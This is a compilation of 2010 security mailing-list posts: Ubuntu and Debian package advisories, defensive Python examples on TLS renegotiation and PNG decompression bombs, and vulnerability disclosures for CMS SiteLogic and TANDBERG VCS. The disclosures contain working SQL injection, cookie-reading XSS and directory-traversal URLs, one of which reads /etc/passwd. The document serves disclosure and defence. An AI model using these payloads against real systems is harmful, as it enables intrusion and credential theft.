http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d-dbg_3.12.6-0ubuntu0.9.10.2_amd64.deb
  Size/MD5:  3235700 8227d9d710a9784750fc541f82d85101

http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d_3.12.6-0ubuntu0.9.10.2_amd64.deb
  Size/MD5:  1234558 f8db18eb4fec7df4387e5e546ea99871

http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-dev_3.12.6-0ubuntu0.9.10.2_amd64.deb
  Size/MD5:   263208 692167e64c00a9990af72a28299b4fbb

http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-0d_3.12.6-0ubuntu0.9.10.2_amd64.deb
  Size/MD5:    17854 f9fa214108ab20d8fe4d61567a86d7c0

http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-tools_3.12.6-0ubuntu0.9.10.2_amd64.deb
  Size/MD5:   313212 4ae57dcb06572bcdc1e311977a965c55

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d-dbg_3.12.6-0ubuntu0.9.10.2_i386.deb
  Size/MD5:  3178422 4a141b3f01631497184c0bb260a212f3

http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-1d_3.12.6-0ubuntu0.9.10.2_i386.deb
  Size/MD5:  1119994 8e4bfbd067aa051603306ce57949ce51

http://security.ubuntu.com/ubuntu/pool/main/n/nss/libnss3-dev_3.12.6-0ubuntu0.9.10.2_i386.deb
  Size/MD5:   260530 c61feb6f65d7419f93f355a5f0755917

http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-0d_3.12.6-0ubuntu0.9.10.2_i386.deb
  Size/MD5:    17856 05ac21be0089e816c076f8707d41d21b

http://security.ubuntu.com/ubuntu/pool/universe/n/nss/libnss3-tools_3.12.6-0ubuntu0.9.10.2_i386.deb
  Size/MD5:   299834 26d317dc29710b27dd0d0b7a36b6c2a1

  lpia architecture (Low Power Intel Architecture):


http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d-dbg_3.12.6-0ubuntu0.9.10.2_lpia.deb
  Size/MD5:  3216556 9230b137f92129c304dddfc5c67853fe

http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d_3.12.6-0ubuntu0.9.10.2_lpia.deb
  Size/MD5:  1095892 9566ecb3416bd99ba0e6288505626fe9

http://ports.ubuntu.com/pool/main/n/nss/libnss3-dev_3.12.6-0ubuntu0.9.10.2_lpia.deb
  Size/MD5:   259484 0236cb25267ac3ca1b3bfd586d14d26d

http://ports.ubuntu.com/pool/universe/n/nss/libnss3-0d_3.12.6-0ubuntu0.9.10.2_lpia.deb
  Size/MD5:    17858 ecb362aec61c87f1cfc4e86cd2dec5cb

http://ports.ubuntu.com/pool/universe/n/nss/libnss3-tools_3.12.6-0ubuntu0.9.10.2_lpia.deb
  Size/MD5:   298510 2977f41a1b2fcf7ca25b331336f7dc8f

  powerpc architecture (Apple Macintosh G3/G4/G5):


http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d-dbg_3.12.6-0ubuntu0.9.10.2_powerpc.deb
  Size/MD5:  3325490 ac9caf32bab4d4b911d1c54112583b65

http://ports.ubuntu.com/pool/main/n/nss/libnss3-1d_3.12.6-0ubuntu0.9.10.2_powerpc.deb
  Size/MD5:  1207122 99b17d40842c1804ee23d19e4a7ffaa0

http://ports.ubuntu.com/pool/main/n/nss/libnss3-dev_3.12.6-0ubuntu0.9.10.2_powerpc.deb
  Size/MD5:   261820 f46b59e90bf4ff07ca79b5d404f372ed

http://ports.ubuntu.com/pool/universe/n/nss/libnss3-0d_3.12.6-0ubuntu0.
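USN-927-1 above and the original advisory details quoted in USN-927-2 both describe CVE-2009-3555 and the RFC 5746 renegotiation_info extension that NSS 3.12.6 adds, used "when the server supports it". The check a practitioner wants after patching the client side is therefore whether a given server negotiates RFC 5746 at all. The Python below is an added example, not Ubuntu's or NSS's code: it builds a ClientHello that signals RFC 5746 both ways (the SCSV in the cipher list and an empty renegotiation_info extension) and parses the ServerHello for the echoed extension. The numeric constants come from RFC 5746; the probe() helper and the two sample ServerHello records are assumptions constructed here, not captured traffic.

```python
"""Does a TLS server negotiate RFC 5746 secure renegotiation?

Added example, not NSS or Ubuntu code. Constants are from RFC 5746; the
sample ServerHello records are constructed here.
"""
import os
import socket
import struct

TLS_EMPTY_RENEGOTIATION_INFO_SCSV = 0x00FF   # RFC 5746, section 3.3
EXT_RENEGOTIATION_INFO = 0xFF01              # RFC 5746, section 3.2
TLS_RSA_WITH_AES_128_CBC_SHA = 0x002F        # one real suite so the hello is acceptable
TLS_1_0 = b"\x03\x01"


def build_client_hello(client_random=None):
    """TLS 1.0 record with a ClientHello that signals RFC 5746 via the SCSV
    and via an empty renegotiation_info extension."""
    client_random = client_random or os.urandom(32)
    ciphers = struct.pack("!HH", TLS_RSA_WITH_AES_128_CBC_SHA,
                          TLS_EMPTY_RENEGOTIATION_INFO_SCSV)
    ext = struct.pack("!HHB", EXT_RENEGOTIATION_INFO, 1, 0)   # type, len 1, empty renegotiated_connection
    body = (TLS_1_0 + client_random
            + b"\x00"                                   # empty session_id
            + struct.pack("!H", len(ciphers)) + ciphers
            + b"\x01\x00"                               # compression: null only
            + struct.pack("!H", len(ext)) + ext)
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body   # HandshakeType client_hello
    return b"\x16" + TLS_1_0 + struct.pack("!H", len(handshake)) + handshake


def parse_server_hello(record):
    """Return {'cipher_suite': int, 'extensions': {type: data}} for the
    ServerHello that opens a handshake record; ValueError otherwise."""
    if len(record) < 5 or record[0] != 0x16:
        raise ValueError("not a handshake record")
    rec_len = struct.unpack("!H", record[3:5])[0]
    hs = record[5:5 + rec_len]
    if len(hs) < 4 or hs[0] != 0x02:
        raise ValueError("record does not start with a ServerHello")
    body = hs[4:4 + int.from_bytes(hs[1:4], "big")]
    pos = 2 + 32                        # server_version + random
    pos += 1 + body[pos]                # session_id
    cipher_suite = struct.unpack("!H", body[pos:pos + 2])[0]
    pos += 3                            # cipher suite + compression method
    extensions = {}
    if pos < len(body):                 # the extensions block is optional
        end = pos + 2 + struct.unpack("!H", body[pos:pos + 2])[0]
        pos += 2
        if end > len(body):
            raise ValueError("extensions overrun ServerHello")
        while pos + 4 <= end:
            etype, elen = struct.unpack("!HH", body[pos:pos + 4])
            pos += 4
            if pos + elen > end:
                raise ValueError("extension overruns block")
            extensions[etype] = body[pos:pos + elen]
            pos += elen
    return {"cipher_suite": cipher_suite, "extensions": extensions}


def supports_secure_renegotiation(server_hello_record):
    """On an initial handshake a patched server echoes renegotiation_info with an
    empty renegotiated_connection, i.e. the single byte 0x00."""
    ext = parse_server_hello(server_hello_record)["extensions"]
    return ext.get(EXT_RENEGOTIATION_INFO) == b"\x00"


def _recv_exactly(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed before a full record arrived")
        buf += chunk
    return buf


def probe(host, port=443, timeout=5.0):
    """Network check (assumed helper): send our ClientHello, read one record, decide."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_client_hello())
        header = _recv_exactly(s, 5)
        payload = _recv_exactly(s, struct.unpack("!H", header[3:5])[0])
    return supports_secure_renegotiation(header + payload)


def _sample_server_hello(with_renegotiation_info):
    """Constructed ServerHello standing in for a patched / unpatched server."""
    body = TLS_1_0 + b"\x11" * 32 + b"\x00" + struct.pack("!HB", TLS_RSA_WITH_AES_128_CBC_SHA, 0)
    if with_renegotiation_info:
        ext = struct.pack("!HHB", EXT_RENEGOTIATION_INFO, 1, 0)
        body += struct.pack("!H", len(ext)) + ext
    hs = b"\x02" + len(body).to_bytes(3, "big") + body
    return b"\x16" + TLS_1_0 + struct.pack("!H", len(hs)) + hs


SAMPLE_PATCHED_SERVER_HELLO = _sample_server_hello(True)
SAMPLE_LEGACY_SERVER_HELLO = _sample_server_hello(False)

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        print(sys.argv[1], "secure renegotiation:", probe(sys.argv[1]))
    print("patched sample:", supports_secure_renegotiation(SAMPLE_PATCHED_SERVER_HELLO))
    print("legacy sample: ", supports_secure_renegotiation(SAMPLE_LEGACY_SERVER_HELLO))
```

A server that answers without the extension is one the patched NSS client will still talk to; the notice says the client uses the extension only "when the server supports it", so the legacy result above is exactly the case where the original man-in-the-middle prefix injection remains possible until the server side is upgraded as well.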

[SECURITY] [DSA 2032-1] New libpng packages fix several vulnerabilities

2010-04-12 Thread Giuseppe Iuculano
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

------------------------------------------------------------------------
Debian Security Advisory DSA-2032-1                  secur...@debian.org
http://www.debian.org/security/                        Giuseppe Iuculano
April 11, 2010                        http://www.debian.org/security/faq
------------------------------------------------------------------------

Package: libpng
Vulnerability  : several
Problem type   : local (remote)
Debian-specific: no
CVE Id(s)  : CVE-2009-2042 CVE-2010-0205
Debian Bugs: 533676 572308


Several vulnerabilities have been discovered in libpng, a library for
reading and writing PNG files. The Common Vulnerabilities and
Exposures project identifies the following problems:

CVE-2009-2042

libpng does not properly parse 1-bit interlaced images with width values
that are not divisible by 8, which causes libpng to include
uninitialized bits in certain rows of a PNG file and might allow remote
attackers to read portions of sensitive memory via "out-of-bounds
pixels" in the file.


CVE-2010-0205

libpng does not properly handle compressed ancillary-chunk data that has
a disproportionately large uncompressed representation, which allows
remote attackers to cause a denial of service (memory and CPU
consumption, and application hang) via a crafted PNG file.


For the stable distribution (lenny), these problems have been fixed in
version 1.2.27-2+lenny3.

For the testing (squeeze) and unstable (sid) distribution, these
problems have been fixed in version 1.2.43-1.

We recommend that you upgrade your libpng package.

Upgrade instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 5.0 alias lenny
--------------------------------

Debian (stable)
---------------

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, 
mips, mipsel, powerpc, s390 and sparc.

Source archives:

  
http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27-2+lenny3.dsc
Size/MD5 checksum: 1201 abe81b0d3c4aa7a1fa418e29f2c5b297
  
http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27.orig.tar.gz
Size/MD5 checksum:   783204 13a0de401db1972a8e68f47d5bdadd13
  
http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27-2+lenny3.diff.gz
Size/MD5 checksum:19687 60ede1843ceb8a1f127c54b847a74dfa

Architecture independent packages:

  
http://security.debian.org/pool/updates/main/libp/libpng/libpng3_1.2.27-2+lenny3_all.deb
Size/MD5 checksum:  880 028b00e28aad8282714776c5dcca64a8

alpha architecture (DEC Alpha)

  
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny3_alpha.udeb
Size/MD5 checksum:86562 d9c50af59951e972557d393409b75bf2
  
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny3_alpha.deb
Size/MD5 checksum:   287752 1d7d84aee223c0933d1a616722607096
  
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny3_alpha.deb
Size/MD5 checksum:   182436 001ecbf421f70ca521a3968f1d14c874

amd64 architecture (AMD x86_64 (AMD64))

  
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny3_amd64.udeb
Size/MD5 checksum:71912 78fbe1a6568671e4c557ec12e29481b0
  
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny3_amd64.deb
Size/MD5 checksum:   254500 481312a64867f31c363b7fbba9cfe171
  
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny3_amd64.deb
Size/MD5 checksum:   167864 3d285c20d2f080313f82eb09dcb7261b

arm architecture (ARM)

  
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny3_arm.udeb
Size/MD5 checksum:64566 a4a9742190557d14beae40133fb46cf1
  
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny3_arm.deb
Size/MD5 checksum:   245438 a16f62e771622e05812172f7c7066504
  
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny3_arm.deb
Size/MD5 checksum:   159612 81facf06de458dd6b1e84a78bb1acfc8

armel architecture (ARM EABI)

  
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny3_armel.udeb
Size/MD5 checksum:67028 56fc4199656d239231c7b8d8e035fead
  
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny3_armel.deb
Size/MD5 checksum:   245930 9f64181bc16af0ad0de4ba2e86b25706
  
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.
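The CVE-2010-0205 entry above describes a compressed ancillary chunk whose inflated size is out of all proportion to its size on disk. As an added illustration of that failure mode (not part of the Debian advisory and not libpng's own fix), the Python below walks a PNG's chunk list, checks each CRC, and inflates zTXt chunks under a hard output cap, so a chunk that expands past the cap is rejected before it consumes memory and CPU. The PNG bytes are constructed inline, and the 64 KiB cap is an assumed value; the 1-bit interlaced issue (CVE-2009-2042) is not modelled here.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"

# Ceiling on inflated bytes accepted from one compressed ancillary chunk.
# Assumed value for this example; a real decoder picks a limit that fits the
# metadata it expects to see (a few KiB of text, not megabytes).
MAX_INFLATED_CHUNK = 64 * 1024


def chunk(ctype: bytes, data: bytes) -> bytes:
    """Serialise one PNG chunk: 4-byte length, type, data, CRC-32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def ztxt(keyword: bytes, text: bytes) -> bytes:
    """zTXt layout: keyword, NUL separator, compression method 0, deflate stream."""
    return chunk(b"zTXt", keyword + b"\x00\x00" + zlib.compress(text))


def build_png(extra_chunks) -> bytes:
    """Constructed 1x1 8-bit greyscale PNG with the given chunks after IHDR."""
    ihdr = chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0))
    idat = chunk(b"IDAT", zlib.compress(b"\x00\x00"))  # filter byte 0 + one pixel
    return PNG_SIGNATURE + ihdr + b"".join(extra_chunks) + idat + chunk(b"IEND", b"")


# Constructed inputs: a benign comment, and a chunk of a few KiB that inflates to 4 MiB.
BENIGN_PNG = build_png([ztxt(b"Comment", b"constructed sample")])
BOMB_PNG = build_png([ztxt(b"Comment", b"\x00" * (4 * 1024 * 1024))])


def inflate_capped(data: bytes, limit: int) -> bytes:
    """Inflate `data`, raising ValueError as soon as output would exceed `limit`.

    decompressobj().decompress(buf, max_length) never returns more than
    max_length bytes and leaves the input it did not reach in unconsumed_tail,
    so asking for limit + 1 bytes detects an oversize stream without ever
    materialising the whole thing.
    """
    d = zlib.decompressobj()
    out = bytearray()
    buf = data
    while buf:
        out += d.decompress(buf, limit + 1 - len(out))
        if len(out) > limit:
            raise ValueError(f"compressed chunk inflates past {limit} bytes")
        buf = d.unconsumed_tail
        if d.eof:
            break
    if not d.eof:
        raise ValueError("truncated compressed stream")
    return bytes(out)


def parse_png(blob: bytes, limit: int = MAX_INFLATED_CHUNK) -> dict:
    """Walk the chunk list, verify every CRC and return {keyword: text} from zTXt.

    Raises ValueError for a malformed file or for a zTXt chunk that inflates
    past `limit` (the CVE-2010-0205 pattern).
    """
    if not blob.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file")
    pos, texts, saw_iend = len(PNG_SIGNATURE), {}, False
    while pos + 8 <= len(blob):
        length, ctype = struct.unpack(">I4s", blob[pos:pos + 8])
        if length > 0x7FFFFFFF:
            raise ValueError("chunk length exceeds 2^31-1")
        start, end = pos + 8, pos + 8 + length
        if end + 4 > len(blob):
            raise ValueError(f"truncated {ctype!r} chunk")
        data = blob[start:end]
        (crc,) = struct.unpack(">I", blob[end:end + 4])
        if crc != zlib.crc32(ctype + data) & 0xFFFFFFFF:
            raise ValueError(f"CRC mismatch in {ctype!r} chunk")
        if ctype == b"zTXt":
            keyword, _, rest = data.partition(b"\x00")
            if not 1 <= len(keyword) <= 79 or not rest or rest[0] != 0:
                raise ValueError("malformed zTXt chunk")
            try:
                text = inflate_capped(rest[1:], limit)
            except zlib.error as exc:
                raise ValueError(f"corrupt zTXt stream: {exc}") from None
            texts[keyword.decode("latin-1")] = text.decode("latin-1")
        elif ctype == b"IEND":
            saw_iend = True
            break
        pos = end + 4
    if not saw_iend:
        raise ValueError("missing IEND chunk")
    return texts


def is_safe_png(blob: bytes, limit: int = MAX_INFLATED_CHUNK) -> bool:
    """True when the file parses cleanly under the inflation cap."""
    try:
        parse_png(blob, limit)
        return True
    except ValueError:
        return False
```

The cap is applied per chunk; a file may carry many small zTXt, iTXt and zTXt-like chunks, so a production decoder would also bound the total across the file and the number of chunks it is willing to inflate.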

Vulnerabilities in CMS SiteLogic

2010-04-12 Thread MustLive

Hello Bugtraq!

I want to warn you about security vulnerabilities in CMS SiteLogic. It's a
Ukrainian commercial CMS. In addition to previously reported vulnerabilities
(disclosed this year), I will report vulnerabilities in this CMS which I
disclosed in 2009.

-
Advisory: Vulnerabilities in CMS SiteLogic
-
URL: http://websecurity.com.ua/3272/
-
Affected products: all versions of CMS SiteLogic.
-
Timeline:
03.03.2008 - found vulnerabilities.
03.03.2008 - informed developers. At first I used the private disclosure
approach, but they just ignored it (both the holes in their CMS and the holes
at their web site). So then I used the responsible full disclosure approach.
08.02.2009 - informed admins of vulnerable web site where I found
vulnerabilities (they also ignored).
27.06.2009 - disclosed at my site.
28.06.2009 - additionally informed developers.
-
Details:

These are SQL Injection, Full path disclosure and Cross-Site Scripting
vulnerabilities.

SQL Injection:

http://site/index.php?mid=-1%20union%20select%201,1,version(),1,1,1,1,1

Full path disclosure:

http://site/index.php?mid=’

http://site/includes/stat.php

XSS:

http://site/index.php?mid=10&action=news_full&search_item=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/index.php?mid=45&action=search_list&str=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 



[SECURITY] [DSA 2031-1] New krb5 packages fix denial of service

2010-04-12 Thread Giuseppe Iuculano
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-2031-1  secur...@debian.org
http://www.debian.org/security/                         Giuseppe Iuculano
April 11, 2010                          http://www.debian.org/security/faq
- 

Package: krb5
Vulnerability  : use-after-free
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2010-0629
Debian Bug : 567052


Sol Jerome discovered that the kadmind service in krb5, a system for
authenticating users and services on a network, allows remote authenticated
users to cause a denial of service (daemon crash) via a request from a kadmin
client that sends an invalid API version number.


For the stable distribution (lenny), this problem has been fixed in
version 1.6.dfsg.4~beta1-5lenny3.

The testing distribution (squeeze), and the unstable distribution (sid) are
not affected by this issue.

We recommend that you upgrade your krb5 package.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian (stable)
- ---

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, 
mips, mipsel, powerpc, s390 and sparc.

Source archives:

  
http://security.debian.org/pool/updates/main/k/krb5/krb5_1.6.dfsg.4~beta1-5lenny3.dsc
Size/MD5 checksum: 1537 5e303b1137773a3151e3c32c3e711707
  
http://security.debian.org/pool/updates/main/k/krb5/krb5_1.6.dfsg.4~beta1.orig.tar.gz
Size/MD5 checksum: 11647547 08d6ce311204803acbe878ef0bb23c71
  
http://security.debian.org/pool/updates/main/k/krb5/krb5_1.6.dfsg.4~beta1-5lenny3.diff.gz
Size/MD5 checksum:   852374 02717d2cea45f186eb05cd196d8035ac

Architecture independent packages:

  
http://security.debian.org/pool/updates/main/k/krb5/krb5-doc_1.6.dfsg.4~beta1-5lenny3_all.deb
Size/MD5 checksum:  2149738 7d91c163fb39f13e4bb9371d6700ec34

alpha architecture (DEC Alpha)

  
http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.6.dfsg.4~beta1-5lenny3_alpha.deb
Size/MD5 checksum:72254 5f5136a8eb5b652ff3425220372982d6
  
http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.6.dfsg.4~beta1-5lenny3_alpha.deb
Size/MD5 checksum:   179752 6bfe9b06aefbd13d82e449001f061f07
  
http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.6.dfsg.4~beta1-5lenny3_alpha.deb
Size/MD5 checksum:92810 d28e976f4aaf8a7a3048144198a250fd
  
http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc-ldap_1.6.dfsg.4~beta1-5lenny3_alpha.deb
Size/MD5 checksum:   112938 8a8f3658363a97fb221145454deea825
  
http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.6.dfsg.4~beta1-5lenny3_alpha.deb
Size/MD5 checksum:98620 ceb3367cea07913abcb6bf91db125abf
  
http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.6.dfsg.4~beta1-5lenny3_alpha.deb
Size/MD5 checksum:   538482 5f795f3b40ef6a719b4477c21a331759
  
http://security.debian.org/pool/updates/main/k/krb5/krb5-pkinit_1.6.dfsg.4~beta1-5lenny3_alpha.deb
Size/MD5 checksum:70284 240ec4c435b3824878d9945807c10e2d
  
http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.6.dfsg.4~beta1-5lenny3_alpha.deb
Size/MD5 checksum:   149846 059e17811c7ff7be4b3e80fb41b19929
  
http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dbg_1.6.dfsg.4~beta1-5lenny3_alpha.deb
Size/MD5 checksum:  1351808 246d6c6583b4112ab05b294ae31674f6
  
http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.6.dfsg.4~beta1-5lenny3_alpha.deb
Size/MD5 checksum:   255514 949a91a2551f17746d37098298c05e3b
  
http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.6.dfsg.4~beta1-5lenny3_alpha.deb
Size/MD5 checksum:   219390 8cf3087d18ad516640537ecbefc9a0cd
  
http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.6.dfsg.4~beta1-5lenny3_alpha.deb
Size/MD5 checksum:98526 43677b97645fe8fd143ff676a1a7e63f
  
http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.6.dfsg.4~beta1-5lenny3_alpha.deb
Size/MD5 checksum:83188 c3630cba3fb62edc816221242cb032aa

amd64 architecture (AMD x86_64 (AMD64))

  
http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.6.dfsg.4~beta1-5lenny3_amd64.deb
Size/MD5 checksum:   238796 045b29e14a6188aa596a209a3762b78e
  
http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.6.dfsg.4~beta1-5lenny3_amd64.deb
Size/MD5 checksum:   169808 099c0806d6f0010d1089d066991b1ad9
  
http://security.deb

CVE-2009-4511: TANDBERG VCS Arbitrary File Retrieval

2010-04-12 Thread VSR Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1



   Virtual Security Research, LLC.
  http://www.vsecurity.com/
 Security Advisory


- 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Advisory Name: TANDBERG Video Communication Server Arbitrary File Retrieval
 Release Date: 2010-04-09
  Application: Video Communication Server (VCS)
 Versions: x4.3.0, x4.2.1, and possibly earlier
 Severity: Medium
Discovered by: Jon Hart
  Advisory by: Timothy D. Morgan 
Vendor Status: Firmware update released [2]
CVE Candidate: CVE-2009-4511
Reference: http://www.vsecurity.com/resources/advisory/20100409-3/

- 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


Product Description
- ---
- From [1]:

 "The Video Communication Server (VCS) is an integral part of the TANDBERG 
  Total Solution and is the center of the video communications network, 
  connecting the benefits of video conferencing and telepresence to other 
  communications environments including unified communications and IP Telephony
  networks."


Vulnerability Overview
- --
On December 3rd, VSR identified a directory traversal and file retrieval
vulnerability in TANDBERG's Video Communication Server.  This issue would
allow an authenticated attacker (who has access as an administrator or less
privileged user on the web administration interface) to retrieve files from the
filesystem which are readable by the "nobody" system user.


Product Background
- --
The TANDBERG Video Communication Server is a Linux-based appliance which
supports the interoperation of a plethora of video and voice communications
devices.  The VCS provides a web-based management interface implemented in PHP
which allows administrators to perform a wide variety of actions, including
configuration of the device, management of user accounts, firmware updates, 
along with a number of other items.


Vulnerability Details
- -
The TANDBERG VCS web management interface provides two nearly identical scripts
at URLs:
  https://vulnerable.example.com/helppage.php
  https://vulnerable.example.com/user/helppage.php

These help pages accept a "file" parameter in the URL which can be used to
retrieve nearly arbitrary files from the filesystem.  The relevant source code
for these pages is as follows:

// The following is Copyright (C) 2009 TANDBERG //
...
// Grab the content before we write anything: we'll need it for the title tag 
in the 
// Dig out the page title, from the  tag, 
// then remove any surround in the page as we add our own... 
$filename = $this->helpPagePath . $_GET['page'] . $this->helpPageSuffix;
   
if (! file_exists($filename)) {
  $helpHTML = "There is no help available for the ". $_GET['page'] . " 
page";
  $pageTitle = $_GET['page'];
}else{
  $helpHTML = file_get_contents($filename);

...

  echo "\n\n";
  echo $helpHTML;
  echo "\n";
...
// end of excerpt //


Here, the final path string ($filename) loaded and displayed to the user is
prepended with a directory and appended with a file extension.  Using simple
directory traversal techniques ("../") it is possible to traverse to any
directory on the filesystem.  Using a trailing NUL byte encoded in the URL (%00)
it is also possible to truncate the file path to eliminate the file extension.

For instance, the following URL retrieves the /etc/passwd file:

  https://vulnerable.example.com/helppage.php?page=../../../../etc/passwd%00


During testing, it was found that the x4.2.1 firmware runs the web server as the
"nobody" user, which somewhat limits the amount of sensitive information that
may be obtained.  However, since shadowed passwords were not configured, it was
possible to retrieve all local system users' password hashes from /etc/passwd. 
Additional password hashes are available in /tandberg/persistent/etc/digest.


Versions Affected
- -
VSR has successfully exploited this issue in firmware version x4.2.1.  Based on
preliminary source code analysis[2], versions x4.3.0 and x5.0 also appear to be
vulnerable.  Earlier versions have not been tested.


Vendor Response
- ---
The following timeline details TANDBERG's response to the reported issue:

2009-12-09Preliminary notice to TANDBERG. TANDBERG responded immediately.

2009-12-22VSR provided TANDBERG a draft advisory.

2009-12-28TANDBERG provided VSR with a beta version of the x5.0 firmware,
  but this did not appear to correct the issue (based on PHP code
  analysis alone).

2010-01-22TANDBERG provided VSR with a beta version of the x5.1 firmware 
  for testing which appeared to correct the vulnerability.

2010-03-26TANDBERG provided VSR with a release candidate firmware for 
  version x5.1.1.

2010-04-07TANDBERG VCS firmware version x5.1.1 released [2].

2010-04-09 

CVE-2009-4510: TANDBERG VCS Static SSH Host Keys

2010-04-12 Thread VSR Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1



   Virtual Security Research, LLC.
  http://www.vsecurity.com/
 Security Advisory


- 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Advisory Name: TANDBERG Video Communication Server Static SSH Host Keys
 Release Date: 2010-04-09
  Application: Video Communication Server (VCS)
 Versions: x4.3.0, x4.2.1, and possibly earlier
 Severity: High
Discovered by: Jon Hart
  Advisory by: Timothy D. Morgan 
Vendor Status: Firmware version x5.1.1 released [2].
CVE Candidate: CVE-2009-4510
Reference: http://www.vsecurity.com/resources/advisory/20100409-2/

- 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


Product Description
- ---
- From [1]:

 "The Video Communication Server (VCS) is an integral part of the TANDBERG 
  Total Solution and is the center of the video communications network, 
  connecting the benefits of video conferencing and telepresence to other 
  communications environments including unified communications and IP Telephony
  networks."


Vulnerability Overview
- --
On December 2nd, VSR identified an SSH service authentication weakness
vulnerability in TANDBERG's Video Communication Server.  This issue would
allow an attacker with privileged network access to conduct server impersonation
and man-in-the-middle attacks on administrator SSH sessions.  Successful attacks
could yield shell access to vulnerable appliances.


Product Background
- --
The TANDBERG Video Communication Server is a Linux-based appliance which
supports the interoperation of a plethora of video and voice communications
devices.  The VCS provides several system shell accounts accessible via the SSH
protocol.


Vulnerability Details
- -
The TANDBERG VCS appliance is deployed by default with a DSA ssh key pair stored
in files:
 /tandberg/sshkeys/ssh_host_dsa_key
 /tandberg/sshkeys/ssh_host_dsa_key.pub

In tested versions of the firmware, this default key has a fingerprint of: 
  49:53:bf:94:2a:d7:0c:3f:48:29:f7:5b:5d:de:89:b8

No new key is generated upon installation.  In addition, during a firmware
upgrade this default key would overwrite any SSH server keys previously
installed by security-conscious administrators.

Due to the public nature of this key (see firmware downloads [2]) an attacker
would be able to conduct server impersonation and man-in-the-middle attacks on
SSH connections directed at any TANDBERG VCS device.  A successful exploit would
most likely yield an attacker shell access to the device with privileges of the
victim client.


Versions Affected
- -
VSR has observed this vulnerability in version x4.2.1.  Based on preliminary
analysis of configuration files and scripts [2], versions x4.3.0 and x5.0 also
